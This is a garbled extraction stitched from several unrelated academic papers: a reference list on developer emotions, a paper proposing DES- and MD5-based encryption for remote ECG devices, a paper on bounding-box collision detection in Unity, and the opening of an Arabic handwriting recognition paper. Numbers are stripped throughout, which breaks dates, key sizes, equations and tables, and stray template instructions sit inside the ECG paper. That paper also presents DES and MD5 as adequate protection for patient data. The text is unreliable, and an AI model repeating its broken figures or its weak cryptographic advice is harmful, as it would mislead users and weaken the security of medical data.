http://dx.doi.org/ . /icse. . http://dx.doi.org/ . /annurev-clinpsy- - http://dx.doi.org/ . /j.paid. . . http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://www.oed.com/view/entry/ http://dx.doi.org/ . /mc. . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . / http://dx.doi.org/ . /amr. . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / - x. . . http://dx.doi.org/ . / http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /icse. . http://dx.doi.org/ . /peerj-cs. schwarz n, clore gl. . mood, misattribution, and judgments of well-being: informative and directive functions of affective states. journal of personality and social psychology ( ): – doi . / - . . . . shockley km, ispas d, rossi me, levine el. . a meta-analytic investigation of the relationship between state affect, discrete emotions, and job performance. human performance ( ): – doi . / . . . squires a. . methodological challenges in cross-language qualitative research: a research review. international journal of nursing studies ( ): – doi . /j.ijnurstu. . . . strauss a, corbin j. . grounded theory methodology. in: denzin nk, lincoln ys, eds. handbook of qualitative research. thousand oaks: sage publications inc, – . svahnberg m, aurum a, wohlin c. . using students as subjects—an empirical evaluation. in: proceedings of the second acm/ieee international symposium on empirical software engineering and measurement. piscataway: ieee, – . tichy w. . hints for reviewing empirical work in software engineering. empirical software engineering ( ): – doi . /a: . van nes f, abma t, jonsson h, deeg d. . language differences in qualitative research: is meaning lost in translation? european journal of ageing ( ): – doi . /s - - -y. wagner s, ruhe m. . a systematic review of productivity factors in software development. in: nd international workshop on software productivity analysis and cost estimation, (space ). iscas–sklcs– – , beijing, china. walsham g. . doing interpretive research. european journal of information systems : – doi . /palgrave.ejis. . watson d, clark la, tellegen a. . development and validation of brief measures of positive and negative affect: the panas scales. journal of personality and social psychology ( ): – doi . / - . . . . wegge j, dick rv, fisher gk, west ma, dawson jf. . a test of basic assumptions of affective events theory (aet) in call centre work. british journal of management ( ): – doi . /j. - . . .x. weick ke. . what theory is not, theorizing is. administrative science quarterly ( ): – doi . / . weiss hm, beal dj. . reflections on affective events theory. in: ashkanasy n, zerbe w, härtel c, eds. the effect of affect in organizational settings (research on emotion in organizations, volume ). st edition. emerald group publishing limited, – , chapter doi . /s - ( ) - . weiss h, cropanzano r. . affective events theory: a theoretical discussion of the structure, causes and consequences of affective experiences at work. research in organizational behavior ( ): – . wrobel mr. . emotions in the software development process. in: th international conference on human system interactions (hsi). faculty of electronics, telecommunications and informatics, gdansk university of technology, gdansk, poland. piscataway: ieee, – doi . /hsi. . . yeager lb. . henry george and austrian economics. american journal of economics and sociology ( ): – doi . / - . . graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.ijnurstu. . . http://dx.doi.org/ . /a: http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /palgrave.ejis. http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . / http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /hsi. . http://dx.doi.org/ . / - . http://dx.doi.org/ . /peerj-cs. how do you feel, developer? an explanatory theory of the impact of affects on programming performance introduction background affect, emotion, and mood related work theoretical framework theory construction and representation methodology design data analysis reliability results and discussion events affects attractors interventions focus---progressing and goal setting performance conclusion contributions and implications limitations future work acknowledgements references paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , remote ecg system data encryption scheme liu xin college of information science and engineering ocean university of china qingdao, china e-mail: liuxinouc@ .com wei zhiqiang college of information science and engineering ocean university of china qingdao, china abstract—the remote ecg communicates over the public internet, and the public internet security is not sufficient to ensure the information security of the remote ecg system. user data disclosure poses a security threat to the system. the ecg information security solution proposed in this paper adopts the method of preset multi-key-per-machine at the factory to avoid leakage caused by personnel factors, and uses the hash function to generate a secondary password for communication encryption during network transmission. experiments show that this program can effectively resist the existing various attack methods and fully protect patient data security. keywords-remote ecg system; multi-key-per-machine i. introduction in the remote ecg system, because the terminals are distributed in the vast number of families, clinics, community hospitals, etc., there are problems in the management of physical equipment. since the ecg data is communicated through the internet, there is a problem that the communication data packet can be intercepted and monitored. due to the diversification of commercial channels and construction teams, there is also a risk of technical confidentiality leaks. this paper proposes a remote ecg system data encryption mechanism, which generates unable-to-remember keys by means of a random number generator, establishes a multi-key model, and implements the encryption storage and secure communication technology for periodic replacement of keys. the core design concept of this program is: human beings as a confidential subject is also a key factor in generating leaks. if every link of encryption is implemented by an automatic algorithm and the artificial factors are completely eliminated, the patient data security can still be effectively protected in the presence of the above security management vulnerability. ii. design of information security scheme for remote ecg system the key protocol developed in this paper contains mechanisms for key generation, storage, deployment, and verification. this scheme takes into account various attacks such as brute force cracking by attackers and interception of network communication packets. a. hardware risk control scheme the hardware of the device may be disassembled, and the data on the storage device can be taken out. if the attacker can obtain two devices of the same model, the content of the key can be known through the content comparison. a common method of hardware attacks is the wiretap method. for example, a logic analyzer records and analyzes the timing of signals on the memory bus of the memory device. practice has proved that ordinary memory devices, such as nor flash chip, nand flash chip or i c bus serial memory cannot resist the wiretap method attack. therefore, we must use the tamper-resistant security module (trsm) to store the encryption key. in theory, pure software encryption cannot guarantee the security of the key when there is a possibility that the hardware is disassembled. this solution uses a trsm with a capacity of k bytes, which costs about $ . , and the cost increase for the entire device is negligible. b. research on key agreement of multi-key-per-machine the template is used to format your paper and style the text. all margins, column widths, line spaces, and text fonts are prescribed; please do not alter them. you may note peculiarities. for example, the head margin in this template measures proportionately more than is customary. this measurement and others are deliberate, using specifications that anticipate your paper as one part of the entire proceedings, and not as an independent document. please do not revise any of the current designations. a multi-key-per-machine encryption algorithm is used to encrypt patient data in the terminal device memory. patient data can be sent to the cloud very quickly, but we need to consider the device features in the off-network state. so local storage is still an indispensable feature. considering that the terminal equipment needs to deal with many tasks such as write memory, waveform curve drawing, network communication, alarm and other emergency processing, the encryption algorithm should not adopt an overly complex algorithm. the key point of prevention is to be able to prevent attackers from implementing bulk cracking on same model devices. therefore, the key issue of encryption is the key design and the key storage. doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , c. key design user data (patient ecg data) is encrypted using a block cipher encryption scheme. a block cipher is also called a symmetry cipher. when encrypting plaintext by using a block cipher, firstly, the plaintext needs to be grouped, each group has the same length, and then each set of plaintexts is separately encrypted to obtain a ciphertext of the same length. a block cipher is characterized by the same encryption key as the decryption key. this scheme adopts the des encryption standard, the packet length is bits, and the key length is also bits. there are parity bits in the key, and the actual key length is bits. although des has been replaced by aes, the encryption strength is sufficient for this application and the computational complexity is lower than aes. the modular multiplication that aes needs to use is too computationally intensive for embedded processors and is not suitable for encrypting real-time collected ecg data streams. d. key security strength considering the possibility that the device-side key is forcibly cracked by an attacker, a mechanism for periodically changing the key can be adopted. in general, the life of an electrocardiograph is years. if you change the key once a month, you need keys for a total of bytes. the cloud server's cost of storing million groups of lifetime keys is m, which is still affordable. e. key generation the composition of the key on each terminal device: random numbers are stored as a key sequence, and the total length is bytes. the server can generate a sequence of random numbers with a length of m at a time, and then sequentially intercept bytes for each device. the key of the device and the offset of the key sequence in the server- side master key are recorded in the device's secure memory. the server records the product serial number of each device and the corresponding random number sequence index value. as long as the random number is guaranteed not to be copied by internal spies during the manufacturing process, the security of the key can be ensured. f. key deployment the device should have a k capacity of secure memory(trsm). the user data encryption keys ( bytes long random number) of the full life are loaded into the machine's secure memory at one time when the machine is shipped from the factory. if the device is out of service, you can use these keys in a rolling loop. the device does not update the key after it leaves the factory, preventing the key from being intercepted by the attacker during delivery. after the device leaves the factory, it is no longer necessary to transfer the user data encryption key under any condition, which eliminates the possibility of the key data packet being intercepted. g. key verification the main purpose of key verification is to test whether the encryption-related hardware and software systems are defective. after the machine is assembled, read out the key values in the secure memory, and the md value of the keys is calculated and sent to the cloud server along with the product serial number. if the server-side verification is successful, the key can be considered to have been deployed correctly. if you are worried about the collision of md values, you can pre-calculate all device keys on the server side in advance, and delete the key segments with md duplicates. the probability of such a problem in theory is extremely small. h. key synchronization through the above steps, we deployed the same user data encryption key sequence on the terminal device and the cloud server, but how to use the two is still a problem. ideally, using timestamp as a synchronization parameter is the best solution. the two parties can agree that, from the date of leaving the factory, the natural month is used as the measurement granularity, and a new key is replaced every natural month. the problem is that in the actual use environment, the time accuracy of the device side is completely unsecured. on the one hand, the rtc (real time clock) devices based on quartz crystal oscillators do not achieve such precision, and some devices run faster than others. on the other hand, the rtc backup power failure is difficult to avoid, and the device cannot be abandoned because the clock is inaccurate. furthermore, if the user is allowed to adjust the device time, the attacker can take advantage of this adjustment opportunity to detect the subsequent ciphertext form in advance, which will be a significant security hole. in the case of networking, the server can know the number of key-used-times on the terminal device. when the server finds that the consumption speed of the terminal key is too slow, it is expected that the pre-stored keys will not be used in the entire product life cycle, and the maximum- key-used-times value can be modified by the key agreement protocol (change the maximum-key-used-times to be small). first, a temporary communication key for modifying the maximum-key-used-times value is negotiated using the diffie-hellman key exchange protocol. the generator element p of the large prime number q and the rational number domain fq is required to be pre-agreed between the server and the device. q and p are written into the device's trsm at the factory. the algorithm for generating the temporary communication key k is as follows:  , the server generates a random number x, calculates a = px mod q, and sends it to the terminal;  , the terminal generates a random number y, calculates b = py mod q, and sends it to the server;  , the terminal calculates k = ay mod q, and the server calculates k = bx mod q, which proves that the two k values are equal. international journal of advanced network, monitoring and controls volume , no. , in this way, the server and the terminal share the random number k as a temporary communication key for modifying the maximum-key-used-times, and the attacker cannot detect the communication content. even if the content can be cracked by the attacker, it is only an index value, and the key cannot be derived. the server should record the timestamp of modify the maximum-key-used-times value to avoid modifying it too frequently. modify it to times a month is enough. in the case where the hardware can ensure the security of the key, it is not necessarily meaningful to change the key too frequently. iii. data compression upload scheme design channel eavesdropping is a common attack method. in the internet environment, it is easy to intercept communication packets on the network line by means of route bypass. the scheme adopts data compression and then encrypts and transmits, as shown in fig. , which further increases the attacking difficulty of the attacker while reducing the load of the network. after the cracker obtains the message, the compressed file can be restored by the exhaustive cracking method; since the key used for the two encryptions is different, the original data obtained from the compressed file needs to be cracked again. a legitimate cloud server stores the original key from the factory. it is easy to calculate the compression key from the original key. conversely, since the hash function is irreversible, it is not feasible to derive the original key from the compression key, and the attacker can only crack it by the exhaustive method. figure . two encryption processes both ciphers in fig. use the des algorithm. the hash function uses the md algorithm. md requires a -byte input to generate a -byte output. in order to meet the input requirements of md , the consecutive keys in the key queue are taken as a set of parameters. after the key expires and the next key is replaced, the parameter group is pushed back and used in turn. data compression can use shannon coding or huffman coding. but today there are many mature methods that can be used, and there is no need to reinvent the wheel for a little performance boost. we use two classical algorithms to compress a m size data file. the performance is shown in table . it can be seen that the data is de-duplicated and then compressed, and the compression ratio is the highest, which is beneficial to network transmission. the amount of data generated by the ecg machine per minute is about . m, and the compression algorithm takes less than seconds, which is equivalent to / processor occupancy, and the system can fully withstand this burden. table i. classic compression algorithm performance test algorithm compression ratio time consuming (seconds) gzip (compression) . % dedup (remove duplicates) . % first gzip and then dedub . % first dedub and then gzip . % iv. experiment and verification in order to verify the effectiveness of the security system, the following practical application scenarios are designed to carry out crack attacks on the remote ecg system. attack target: obtain the patient raw data. experimental conditions: provide attack devices and an ecg signal generator to the attack team, and informed the key length and encryption algorithm, the attacker tried on an intel e - (ten core) server, perform no more than hours of calculations on each machine to obtain its patient raw data. experimental results: after several times of improving the attack plan, the attacker violently cracked the data records stored in the device by exhaustive cryptography, and successfully cracked two terminal devices within the specified calculation time, and the cracking time was hours and hours respectively. in the case that the device is not disassembled, the communication message received by the network cannot be successfully cracked. experiments prove that this system is not completely unbreakable in the case of hardware damage, but the cost of cracking is very expensive, and it is not worth the loss. v. conclusion the ecg information security solution proposed in this paper adopts the method of preset multi-key-per-machine at the factory to avoid leakage caused by personnel factors, and uses the hash function to generate a secondary password for communication encryption during network transmission. experiments show that this program can effectively resist the existing various attack methods and fully protect patient data security. acknowledgment this work is supported by the aoshan innovation project in science and technology of qingdao national laboratory for marine science and technology (no. askj ) international journal of advanced network, monitoring and controls volume , no. , references [ ] chen, zhuang, f. qi, and c. ye. "research on cloud data encryption scheme based on chinese cryptographic algorithms." journal of information security research ( ). [ ] huang, pei, et al. "a robust and reusable ecg-based authentication and data encryption scheme for ehealth systems." global communications conference ieee, : - . [ ] quang, do vinh, t. n. k. hoan, and i. koo. "energy-efficient data encryption scheme for cognitive radio networks." ieee sensors journal pp. ( ): - . [ ] liang, kaitai, et al. "an efficient cloud-based revocable identity- based proxy re-encryption scheme for public clouds data sharing." european symposium on research in computer security springer, cham, : - . [ ] xu, lei, x. wu, and x. zhang. "cl-pre:a certificateless proxy re- encryption scheme for secure data sharing with public cloud." acm symposium on information, computer and communications security acm, : - . [ ] gillies, alan. "improving the quality of information security management systems with iso ." tqm journal . ( ): - . [ ] publishing, it governance. iso and information security: a combined glossary. it governance ltd, . [ ] wang, chi hsiang, and d. r. tsai. "integrated installing iso and iso management systems on an organization." international carnahan conference on security technology ieee, : - . international conference on sensor network and computer engineering (icsnce ) research on bounding volume boxes collision detection algorithm in virtual reality technology wan chao school of computer science and engineering xi’an technological university xi'an of shaanxi province, china e-mail: @qq.com liu pingping, hong bo school of computer science and engineering xi’an technological university xi'an of shaanxi province, china e-mail: @qq.com abstract—this paper take the development of virtual campus roaming system as an example. aiming at the defects of the different kinds of bounding boxes collision detection technology, analyzes the advantages of the hybrid hierarchical bounding box collision detection algorithm based on spheres and oriented bounding box, and described the way to construct it. finally, the algorithm is tested in the vc and unity d engine, a good result is obtained. keywords-vr technology; bounding volume boxes; collision detection; unity d i. introduction virtual reality (vr) is a comprehensive technology integrating computer graphics, multimedia technology and many other technologies. its purpose is to simulate the scene in reality. as an open platform, it has three characteristics: interactivity, conceptualization, and immersion [ ]. in order to ensure the sense of the environment, the objects in the scene must have the corresponding physical properties. at the same time, the user will not penetrate the object in various operations, and can truly feel the occurrence of a collision. so collision detection technology has a very important position in the vr technology [ ]. collision detection technology is developing continuously, and some classic collision detection algorithms are widely used. such as aabb (aligned axis bounding box), spheres, obb (oriented bounding box), etc. these methods are applicable to objects with different geometric features, so their simplicity of detection is not ideal. some scholars have proposed a hybrid bounding box algorithm for the reason. an algorithm similar to obb-spheres is formed. in continuous collision detection, some scholars proposed a subspace based algorithm, which effectively improved the speed and accuracy of continuous collision detection. ii. basic principle of collision detection the construction of virtual campus roaming system uses collision detection technology, real-time rendering technology, environment modeling technology, etc. the collision detection technology ensures the true sense of the whole system, and constitutes the basis of the user experience, which gives the user a sense of immersion in the virtual scene. collision detection technology is to increase the impact body on the object in the scene, increase the sense of authenticity, prevents the appearance of the characters through the wall. the overlap of a part of a person and the object in a scene are obviously incompatible with the logic in real life [ ]. the basic principles can be defined as follows: in a virtual three-dimensional space with n objects. its three-dimensional geometric coordinate system and time variable constitute a four dimensional coordinate system, which is represented as wc . the path formed by the motion of the i -th object constitutes a subset of wc . it marked as ic ( ni  ). collision detection is to determine whether the i -th object intersects the i -th object, that is to determine whether ii cc  is empty. for the detection of object collision, unity provides a good test platform that you can create two virtual geometries in it, give them a collision device, and then detect the collision effect between them. it is also possible to create two empty objects, add two specific colliders to them, test the collisions between different colliders directly, in addition you can create an object and a ray of light that simulates the impact of light cast on an object. these correspond to the three kinds of collision detection strategy in unity, they called basic collision detection, trigger collision detection, light projection [ ]. iii. hybrid hierarchical bounding box based on surrounding and directed bounding boxes a. bounding box technology there are many kinds of bounding boxes. some classical methods include spheres, aabb (aligned axis bounding box), obb (oriented bounding box), etc [ ]. this is the main introduction to spheres and obb. ) spheres: bounding sphere (spheres) is a relatively simple but poor tightness bounding box. it will produce too much redundant space for more concave objects as an outer sphere of the geometric object. so there is a phenomenon that the collision occurs when the collision is not touched and the ball is encircled. in order to illustrate the construction process, it is assumed that the geometric object is e, the representation of all the most basic geometric elements (such as triangles and circles) in the object with se. the calculation method of the encircling ball is simpler than that of the other bounding boxes: the average value of three sets international conference on sensor network and computer engineering (icsnce ) of coordinates all the elements in the se (triangle angle bisector intersection coordinate, circle center coordinates value) is centre of bounding sphere, denoted by c (x, y, z). then compare the distance between center and each basic geometric element in the object e, maximum value is that the radius of the bounding sphere, denoted by r. thus, the parameter required to record a ball is much less than that of the other encircling boxes, coordinates a sphere just to give the center ( parameters) and the radius ( parameters). the intersecting test method between the bounding balls is relatively simple. it is only necessary to compare the distance between the two spheres and the sum of their radius. the specific methods are as follows: assuming the center and the radius of the two surrounding spheres are s (x , y , z ), r and s ( x , y , z ), r . if rrss  , then two bounding balls intersected, otherwise, two bounding balls are not intersected. the detailed expression of this inequality is:         rrzzyyxx  ( ) as the sphere rotates in that direction, the parameters that express its attributes will not change, so no matter the surrounding geometric objects rotates any angles, it will not run out of the ball. therefore, when a fixed shape object moves, the encircling ball need not recalculate the radius, but only need to translate the center coordinates accordingly. but you need to recalculation the center and the radius of the object ball for a shape changing object. therefore, the real- time and continuity of the encircling ball collision detection algorithm is poor. ) obb(oriented bounding box): it is a minimum rectangular body that contains a geometric object and has any direction in a coordinate system. how to find the best direction of the long cube when constructing obb and determine the minimum number of reachable length and width is the key to the construction. compared with the encircling ball, the construction of obb seems very difficult, and the concrete construction method of obb is as follows: given a geometric object, in order to distinguish the e mentioned earlier, here is g. similarly, the sg is used to represent the set of all the most basic geometric elements in the object, such as the triangle and the circle. for the sake of simplicity, all the basic elements of the object are assumed to be triangles, it is set to have n triangles in which the three vertices of the i-th (i > ) triangle are recorded as ai, bi, and ci, the values of the mean of the set sg(denoted by μ) and the evaluation method of covariance c are as follows (ai, bi, ci are all one-dimensional vectors):     n i iii cba n  ( )   , ,    kjccbbaa n c n i i k i j i k i j i k i jjk ( ) in which the μ is a one - dimensional vector, cjk is a value, and the symmetric matrix composed of the matrix element cjk is recorded as c. the obtained matrix c is a real symmetric matrix and has three different eigenvalues. therefore, the eigenvectors corresponding to the three eigenvalues are orthogonal to each other. the unit processing of the three eigenvectors obtained is also given a set of base, the group also forms the three axis of the obb, so that the best direction of the obb is determined. the rest is to determine the minimum length and width of the obb. to find the three smallest numbers, we only need to map the vertices of each basic geometric element in sg on the three axis of the axis just obtained. the minimum value on each axis is the required length and width. according to the description of the above construction method, we can know that the structure of obb is very complicated, the description of a obb is also very troublesome, with more parameters needed. a total of numbers need to be described, of which numbers are used to describe three axes, each axis is represented by one dimension vector consisting of three parameters. the remaining numbers represent the length and the corresponding axis of obb length and width. the obb constructed by the above method has high tightness due to its arbitrariness of the substrate, and it can follow the shape change of the object to make the change of the direction length quickly and do not need to recalculate. b. model constructing the three-dimensional modeling of the virtual campus is the three-dimensional modeling of the terrain, roads, buildings, plants and other objects around the campus. the main work of d modeling is to collect, collate, classify and pretreat the basic geographic information for the objects that need to be modeled. the underlying technologies involved are polygonal modeling and texture mapping [ ]. in the traditional d scene building method, various objects in the scene have various geometric representation methods because of their different shapes and precision requirements, the most used model at present are surface model and polygon mesh model. in the campus roaming system, the polygon mesh model is often used because the objects in the scene are mostly edges and corners. polygonal models form the shape of the models from the most basic points and lines, then give the corresponding material to the surface of the object, and add the illumination model to increase the reality of the object. texture mapping technology is used for material additions, a two-dimensional image that represents the surface texture of an object is mapped to the surface of a three-dimensional object. the basic idea is to map the coordinates of the texture patterns to the geometric coordinates of the vertices of the d models in a certain way, and then map the points on the geometric international conference on sensor network and computer engineering (icsnce ) objects onto the screen, and finally display them. as shown in figure . figure . texture map. c. construction of hierarchical encircling box tree the roaming system is a continuous cycle process that draws every frame that is displayed to the user through logical judgment, as shown in figure . in order to improve the speed and real-time performance of collision detection, the traditional bounding box collision detection algorithm can not get the desired result, and the hybrid bounding box algorithm solves this problem [ ]. figure . system running process a hierarchical encircling box tree is a tree structure composed of tree nodes composed of encircling boxes. according to the previous introduction, the obb bounding box algorithm has a better compact type, and the speed is faster when the object is displaced or rotated, but the intersecting test is difficult, and the speed is slow. while the encircling ball algorithm is poor in tightness, but the intersection test is simple and fast, and it has faster update speed than the obb algorithm. in combination with the advantages of the two algorithms, these two algorithms are selected here. the bounding ball algorithm can be used as the root node of the bounding box tree because of the simple speed of intersecting test. it can be used to eliminate a large number of disjoint objects which are easily judged. there are two main methods used to construct encircling box trees. one bottom-up way is to form a basic geometric element of an object as a leaf node, then recursively, and gradually form the final root node, another is the top - down method, which is completely the opposite, it recursive partition from the root node, and finally to the leaf node. a top-down method is used to construct a hierarchical encircling box tree here because of the maturity of the current construction technology and the breadth of use, as shown in figure . figure . the top-down bounding box tree . it is considered whether it is built dynamically or in a static way when building a bounding box tree [ ]. when the static structure is built, it is necessary to rebuild the bounding box tree once the shape changes or moves. otherwise, when the dynamic structure is used, it does not need to be rebuilt with the change of the object. although the dynamic structure is better than the static structure, it needs to modify the node data in real time, and the stability is weak. the real-time performance of the update is difficult to solve. we use the static structure with high stability to build the bounding box tree because the objects in the virtual campus roaming system are mostly static objects, they will not change when they collide. iv. system application and test results in order to verify that the algorithm can realize the collision detection between different geometric features well, the initial test is carried out. a teapot and a cylinder are used for a collision test. the teapot is made up of triangles and vertices, and the cylinder is made up of triangles and vertices. its complexity can meet the test start initialization loading scene mouse/keyboard input? esc? end execution logic picture update output buffer draw to the screen memory monitor no yes no yes texture map geometry screen mappingmapping international conference on sensor network and computer engineering (icsnce ) requirements. a double encircling box is constructed on the vertex of two objects surrounded by two forked trees. the outer layer of the node constructs the encircling ball, and the inner layer of the node constructs the obb and the sphere bounding box respectively. compare it with the collision detection algorithm based on the obb bounding box, rapid. according to the evaluation function of collision detection algorithm: uuppvv cncncnt  ( ) the algorithm and the rapid algorithm are compared and analyzed. on the premise of obtaining the same and correct detection results, the experiment compares the collision detection time between the two algorithms in the same collision scene. according to the collision detection evaluation function, when the two algorithms are used for collision detection, the number of basic geometric primitives pairs involved (np) is the same, and the cost of a pair of geometric primitives (cp) is the same. the same scene is used in the contrast experiment. the motion track of the object is the same. the number of nodes needed to be updated by the two algorithms after the motion of the object is the same as the number of nu. this algorithm updates the cost of a double bounding box (cu), which is the cost of updating an inner bounding box. therefore, the total cost of the two algorithms (t) is related to the cost nv*cv of the bounding box overlap test and the cost cu of updating a bounding box. the algorithm constructs sphere and obb for the inner layer of the two forked tree node of the teapot and the cylinder. the intersecting test of sphere and obb is similar to the obb algorithm, but the test is more rapid and simple, at most only three times. the sphere bounding box is less expensive to update than obb, so the algorithm is less expensive to update a bounding box than the rapid algorithm. the experimental results of the two algorithms are shown in table , and the efficiency comparison of the algorithm is shown in figure . table i. table collision detection time comparison overlap number this paper’s algorithm time- consuming/ms rapid algorithm time-consuming/ms efficiency lifting multiple . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . c o ll is io n d e te c ti o n t im e/ m s triangle overlap number this paper’s algorithm rapid algorithm figure . time contrast diagram of algorithm collision detection the experimental results show that when the number of triangle overlaps is the same, the algorithm reduces the collision detection time and the collision response between objects faster than the rapid algorithm. it improved the reality of the scene when the object collides in real time. with all kinds of collision bounding box collision detection algorithm is developed based on the unity d engine development, software developers only need to add different colliders to objects can complete the corresponding collision detection test algorithm, without the need to write the corresponding collision detection algorithm, which effectively improves the efficiency of software development international conference on sensor network and computer engineering (icsnce ) [ ]. in unity, there are mainly static colliders such as box collider, sphere collider, capsule collider, wheel collider, and rigid body colliders for dynamic objects. in this system, a rigid body collider is added to the roaming role, and various static colliders are added to the objects, such as buildings, flowers and trees, and the ground. the information processing of collision is realized through collision occurrence, collision vanishing and collision maintaining function in script [ ], and a function of pop-up gui interface is added to trigger the specific gui interface in collision occurrence function. this algorithm can also test the collision function of the system through the game interface in unity. when a character collides with a building, the script will trigger a collision event due to adding a collision body to a specific building attachment. then a pop-up information window will be introduced to the corresponding building, and the result is shown in figure . figure . the information window displayed after the collision we can know that the mixed level bounding box collision detection algorithm based on encircling ball and obb bounding box has also achieved very good results in developing the system. it not only enhances the reality of the scene, but also completes the trigger of the window pop- up event through the detection of collision events, which enhances the interactivity and makes the system more humanized. v. conclusion this paper studies virtual campus roaming system based on virtual reality technology, through the whole development process of the system, the implementation principle of the collision detection technology and the hybrid bounding box algorithm based on the encircling ball and the directed bounding box are emphasized. acknowledgment fund support: shaanxi education department special fund project number: shaanxi education finance (gsysj ). references [ ] tang cui-fang, design and implementation of campus roaming system based on virtual reality technology [j], science and technology innovation herald, , , - . [ ] han lei, research on virtual building roaming and collision detection based on unity d [j], academic exchange, , , - + . [ ] wang yu, research and application of collision detection in virtual roaming system [j], electronic design engineering, , , – + . [ ] wang feng-qin, research on virtual training system of rock drilling platform based on unity d [d], shijiazhuang tiedao university, shijazhuang, . [ ] li zhen, research on optimization algorithm for rigid body collision detection in virtual scene [d], jilin agricultural university, changchun, . [ ] wang shuang, cheng yong-dang, kong fan-jin, and yang bin, a survey of virtual reality [j], science & technology vision, , , + . [ ] zhang shao-bo, research on key technology of human-computer interaction in immersive virtual reality [d], chongqing university of posts and telecommunications, chongqi, . [ ] zhang jia-jia, optimization simulation of collision detection in d virtual environment [j], computer simulation, , , - . [ ] lai quan, cha mu-ga, jineerdemutu, and jinhugejiletu, development and research of d visualized campus system based on unity d platform [j], sci-tech information development & economy, , , - . [ ] wang lei, the research of collision detection technology based on hybrid bounding box and its application in web d roaming [d]. shanghai university, shanghai, . i. introduction ii. basic principle of collision detection iii. hybrid hierarchical bounding box based on surrounding and directed bounding boxes a. bounding box technology ) spheres: bounding sphere (spheres) is a relatively simple but poor tightness bounding box. it will produce too much redundant space for more concave objects as an outer sphere of the geometric object. so there is a phenomenon that the collision occurs when the collision is not touched and the ball is encircled. in order to illustrate the construction process, it is assumed that the geometric object is e, the representation of all the most basic geometric elements (such as triangles and circles) in the object with se. the calculation method of the encircling ball is simpler than that of the other bounding boxes: the average value of three sets of coordinates all the elements in the se (triangle angle bisector intersection coordinate, circle center coordinates value) is centre of bounding sphere, denoted by c (x, y, z). then compare the distance between center and each basic geometric element in the object e, maximum value is that the radius of the bounding sphere, denoted by r. thus, the parameter required to record a ball is much less than that of the other encircling boxes, coordinates a sphere just to give the center ( parameters) and the radius ( parameters). the intersecting test method between the bounding balls is relatively simple. it is only necessary to compare the distance between the two spheres and the sum of their radius. the specific methods are as follows: assuming the center and the radius of the two surrounding spheres are s (x , y , z ), r and s ( x , y , z ), r . if , then two bounding balls intersected, otherwise, two bounding balls are not intersected. the detailed expression of this inequality is: ) obb(oriented bounding box): it is a minimum rectangular body that contains a geometric object and has any direction in a coordinate system. how to find the best direction of the long cube when constructing obb and determine the minimum number of reachable length and width is the key to the construction. compared with the encircling ball, the construction of obb seems very difficult, and the concrete construction method of obb is as follows: b. model constructing c. construction of hierarchical encircling box tree iv. system application and test results v. conclusion acknowledgment references submitted june accepted september published october corresponding author iam palatnik de sousa, iam.palat@gmail.com academic editor klara kedem additional information and declarations can be found on page doi . /peerj-cs. copyright palatnik de sousa distributed under creative commons cc-by . open access convolutional ensembles for arabic handwritten character and digit recognition iam palatnik de sousa department of electrical engineering, pontifícia universidade católica do rio de janeiro, rio de janeiro, brazil abstract a learning algorithm is proposed for the task of arabic handwritten character and digit recognition. the architecture consists on an ensemble of different convolutional neural networks. the proposed training algorithm uses a combination of adaptive gradient descent on the first epochs and regular stochastic gradient descent in the last epochs, to facilitate convergence. different validation strategies are tested, namely monte carlo cross-validation and k-fold cross validation. hyper-parameter tuning was done by using the madbase digits dataset. state of the art validation and testing classification accuracies were achieved, with average values of . % and . % respectively. the same algorithm was then trained and tested with the ahcd character dataset, also yielding state of the art validation and testing classification accuracies: . % and . % respectively. subjects algorithms and analysis of algorithms, artificial intelligence, computer vision, data mining and machine learning keywords offline character recognition, arabic handwriting recognition, convolutional neural networks, deep learning introduction offline handwriting recognition refers to the task of determining what letters or digits are present in a digital image of handwritten text. it is considered a subtask of the more general optical character recognition. however, in many applications, from reading bank checks to postal mail triage, offline recognition plays a key role, greatly motivating the development of accurate and fast classification algorithms (abdelazeem, ). the domain of arabic handwriting recognition (ahr), however, has only been explored in depth more recently. younis ( ) notes that ahr suffers from slow development compared to handwriting recognition in other languages. he further mentions that arabic characters contain a specific set of challenges that make the task more difficult. such difficulties include the positioning of dots relative to the main character, the variability caused by the use of the characters in multiple countries and different areas of knowledge and work, among others. given this issue, using datasets that represent this variability on a large number of images is essential. how to cite this article palatnik de sousa ( ), convolutional ensembles for arabic handwritten character and digit recognition. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:iam.palat@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. in the previous decade, a dataset equivalent to mnist (lecun et al., ) was developed to allow for a more direct comparison of the performance of classification algorithms on latin and arabic digits. this dataset was named madbase (abdleazeem & el-sherif, ), and consists of , images of arabic digits, written by participants from different areas of work and backgrounds. these 